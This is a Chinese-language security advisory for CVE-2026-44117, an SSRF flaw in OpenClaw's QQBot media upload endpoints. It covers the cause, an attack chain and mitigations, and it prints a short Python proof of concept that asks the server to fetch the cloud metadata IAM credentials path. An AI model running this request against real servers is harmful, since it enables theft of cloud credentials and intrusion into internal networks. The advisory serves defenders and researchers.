CVE-2026-44117 CVSS 5.8 中危

CVE-2026-44117 OpenClaw 服务端请求伪造漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44117

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在2026.4.20之前的版本中存在一个严重的服务端请求伪造（SSRF）漏洞。该漏洞源于QQBot直接媒体上传功能中缺少必要的URL验证机制。攻击者可以利用这一缺陷，向 `uploadC2CMedia` 和 `uploadGroupMedia` 端点发送特制的恶意图片URL。由于系统未对URL进行严格校验，攻击者能够绕过现有的SSRF防护措施，诱导服务器向内网或其他受限资源发起非预期的请求，从而可能导致敏感信息泄露或进一步的内网渗透。

技术细节

该漏洞的根源在于OpenClaw框架在处理QQBot相关的媒体文件上传逻辑时，对于用户输入的URL参数缺乏严格的格式校验和合法性检查。具体而言，`uploadC2CMedia` 和 `uploadGroupMedia` 两个API接口直接接收外部传入的图片链接，并试图从服务器端发起网络请求下载该媒体资源。在这个过程中，由于代码逻辑跳过了URL白名单验证或DNS重绑定检查，导致未能有效区分合法的外网资源与受限制的内网地址。攻击者可以精心构造恶意的HTTP POST请求，将目标URL设置为内网敏感服务地址（如http://127.0.0.1:6379/、http://169.254.169.254/latest/meta-data/等）。当服务器处理该请求时，会作为代理向这些内部地址发起连接。这不仅使得攻击者能够扫描内网开放端口，还可能结合特定协议（如Gopher）攻击内部数据库或中间件。鉴于CVSS评分中PR:N（无需权限）和UI:N（无需交互），该漏洞极易被利用，攻击者只需发送特制的数据包即可触发SSRF，进而造成内网信息泄露或横向移动。

攻击链分析

STEP 1

侦察

攻击者识别出目标互联网上运行的是OpenClaw受影响版本的实例。

STEP 2

武器化

攻击者构造一个包含内网敏感地址（如云元数据服务或本地回环地址）的特制URL。

STEP 3

交付

攻击者向 `uploadC2CMedia` 或 `uploadGroupMedia` 接口发送包含恶意URL的POST请求。

STEP 4

利用

OpenClaw服务器接收请求，由于未验证URL，服务器向内网目标地址发起HTTP请求。

STEP 5

影响

攻击者通过服务器的响应获取内网敏感信息或进行进一步的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-host:port/api/uploadC2CMedia"
# Malicious payload pointing to internal metadata or local service
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "url": malicious_url
}

try:
    # Send the crafted request to trigger SSRF
    response = requests.post(target_url, json=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    # Check if the response contains internal data
    if "Code" in response.text or "AccessKeyId" in response.text:
        print("[+] Potential SSRF vulnerability confirmed!")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

OpenClaw < 2026.4.20

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.4.20或更高版本。如果无法立即升级，应在网络边界处限制OpenClaw服务器的出站流量，禁止其访问内网敏感网段（如127.0.0.1、169.254.0.0/16等）和公网非必要地址。同时，可以在WAF或API网关层面对`uploadC2CMedia`和`uploadGroupMedia`接口的URL参数进行正则过滤，拦截包含内网IP或特定协议的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表